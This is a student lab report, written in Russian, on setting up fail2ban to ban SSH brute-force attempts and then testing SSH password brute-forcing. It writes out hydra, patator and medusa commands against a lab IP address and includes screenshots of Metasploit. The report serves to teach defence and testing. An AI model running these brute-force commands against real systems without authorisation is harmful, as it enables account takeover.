Шишкин Д.А. ББМО-01-21. Практическая работа “Fail2Ban-SSH и Brute-force attack”.

# Шишкин Д.А. ББМО-01-21. Практическая работа “Fail2Ban-SSH и Brute-force attack”. Обновление списков пакетов `sudo apt-get update` ![](https://i.imgur.com/0chVRlS.png) Установим fail2ban `sudo apt-get install fail2ban` ![](https://i.imgur.com/FdYbsWq.png) Запустим демон ![](https://i.imgur.com/hZGtLCP.png) ![](https://i.imgur.com/QfnEksj.png) Файл конфигурации ![](https://i.imgur.com/lZ0VWoZ.png) ![](https://i.imgur.com/QPs6EdJ.png) Перезапустим демон `service fail2ban restart` ![](https://i.imgur.com/7nJfT00.png) Подключение по ssh с неправильным паролем ![](https://i.imgur.com/HmJqIuy.png) ![](https://i.imgur.com/TGQ6vuu.png) ![](https://i.imgur.com/FyCIRox.png) Адрес был заблокирован ![](https://i.imgur.com/Sr8WgfF.png) Разблокировка ![](https://i.imgur.com/Bz0oMt0.png) ![](https://i.imgur.com/GDGnHoJ.png) Теперь выключим фильтр ![](https://i.imgur.com/g4VPgCX.png) ![](https://i.imgur.com/kmoGjSO.png) ## Brute-force на SSH ### hydra `hydra -l user -P ./test_dict.txt ssh://192.168.100.9 -I -v -V` ![](https://i.imgur.com/dXTFNJw.jpg) ![](https://i.imgur.com/GaYk0wq.png) ### patator `patator ssh_login host=192.168.100.9 user=user password=FILE0 0=test_dict.txt -x ignore:mesg='Authentication failed'` ![](https://i.imgur.com/zOacfOe.png) ### medusa `medusa -h 192.168.100.9 -u user -P test_dict.txt -M ssh -f -v 6` ![](https://i.imgur.com/2rwVsBy.jpg) ### Metasploit ![](https://i.imgur.com/Uk5XWii.jpg) ![](https://i.imgur.com/lI6uyCM.png) ![](https://i.imgur.com/j6MY1XE.jpg)